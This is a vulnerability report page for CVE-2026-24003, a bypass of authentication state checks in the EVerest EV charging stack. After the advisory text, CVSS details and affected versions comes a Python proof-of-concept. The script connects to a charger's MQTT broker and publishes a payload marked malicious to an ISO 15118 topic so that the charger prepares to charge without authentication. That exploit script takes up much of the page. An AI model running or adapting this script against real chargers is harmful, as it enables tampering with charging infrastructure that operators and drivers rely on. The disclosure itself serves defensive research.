Security Vulnerability Report
CVE-2026-24003 CVSS 4.3 MEDIUM

CVE-2026-24003

Published: 2026-01-26 22:15:57
Last Modified: 2026-02-17 20:48:01

Description

EVerest is an EV charging software stack. In versions up to and including 2025.12.1, it is possible to bypass the sequence state verification including authentication, and send requests that transition to forbidden states relative to the current one, thereby updating the current context with illegitimate data. Thanks to the modular design of EVerest, authorization is handled in a separate module and EVSEManager Charger internal state machine cannot transition out of the `WaitingForAuthentication` state through ISO 15118-2 communication. From this state, it was however possible through ISO 15118-2 messages which are published to the MQTT server to trick it into preparing to charge, and even to prepare to send current. The final requirement to actually send current to the EV was the closure of the contactors, which does not appear to be possible without leaving the `WaitingForAuthentication` state and leveraging ISO 15118-2 messages. As of time of publication, no fixed versions are available.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:* - VULNERABLE
EVerest <= 2025.12.1
EVerest/everest-core <= 2025.12.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import paho.mqtt.client as mqtt
import json

# CVE-2026-24003 PoC - MQTT Message Injection for EVerest State Bypass
# Target: EVerest <= 2025.12.1 with ISO 15118-2 support

MQTT_BROKER = "ev_charger_ip"
MQTT_PORT = 1883
TARGET_TOPIC = "everest/iso15118/evse/requests"


def construct_malicious_iso15118_message():
    """
    Construct malicious ISO 15118-2 message to trigger state transition
    This payload targets the EVSEManager state machine bypass
    """
    malicious_payload = {
        "service_id": 1,
        "action": "ServiceDiscovery",
        "session_id": "\x00" * 16,
        "evse_status": {
            "ready": True,
            "isolation_status": "valid",
            "evse_present_voltage": 400,
            "evse_present_current": 0
        },
        "schedule_id": 0,
        "departure_time": 0,
        "requested_energy_amount": 50000,
        "meter_info": {
            "meter_id": "MALICIOUS_METER",
            "meter_reading": 0
        }
    }
    return json.dumps(malicious_payload)


def on_connect(client, userdata, flags, rc):
    print(f"[+] Connected to MQTT broker with result code {rc}")
    payload = construct_malicious_iso15118_message()
    client.publish(TARGET_TOPIC, payload)
    print(f"[+] Published malicious ISO 15118-2 message to {TARGET_TOPIC}")
    print(f"[+] Payload: {payload}")


def exploit():
    client = mqtt.Client()
    client.on_connect = on_connect
    try:
        client.connect(MQTT_BROKER, MQTT_PORT, 60)
        client.loop_forever()
    except Exception as e:
        print(f"[-] Connection failed: {e}")


if __name__ == "__main__":
    print("CVE-2026-24003 EVerest State Machine Bypass PoC")
    print("Target: EVerest EV Charger <= 2025.12.1")
    print("Attack Vector: ISO 15118-2 MQTT Message Injection")
    exploit()
```

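References

https://github.com/EVerest/everest-core/blob/main/modules/EVSE/EvseV2G/iso_server.cpp#L44 (Product)
https://github.com/EVerest/everest-core/security/advisories/GHSA-9vv5-67cv-9crq (Mitigation, Vendor Advisory)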
